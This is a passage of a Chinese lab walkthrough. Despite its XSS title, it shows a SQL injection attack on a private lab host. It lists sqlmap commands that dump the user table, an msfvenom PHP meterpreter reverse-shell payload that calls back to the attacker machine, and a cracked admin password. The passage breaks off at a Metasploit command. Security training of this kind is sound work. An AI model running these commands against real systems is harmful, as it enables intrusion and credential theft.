XSS跨站脚本
靶机地址:192.168.43.156 攻击机地址:192.168.43.89 一、AppScan检查靶机sql漏洞 二、使用sqlmap利用SQL注入漏洞 1.sqlmap -u " http://192.168.43.156/cat.php?id=1 " –dbs 查看数据库名 2.sqlmap -u " http://192.168.43.156/cat.php?id=1 " -D "photoblog" --tables 表名 3.sqlmap -u " http://192.168.43.156/cat.php?id=1 " -D "photoblog" T "user" --columns 查看字段 4.sqlmap -u " http://192.168.43.156/cat.php?id=1 " -D "photoblog" T "user" -C "login" --dump 用同种方法查找密码 三、建立反弹shell msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw 在桌面建一个文件shell.php 四、登录后台页面 刚在数据库拿到的用户名:admin 密码需要用MD5解密为: P4ssw0rd 在kali系统内 msf > use exploit/multi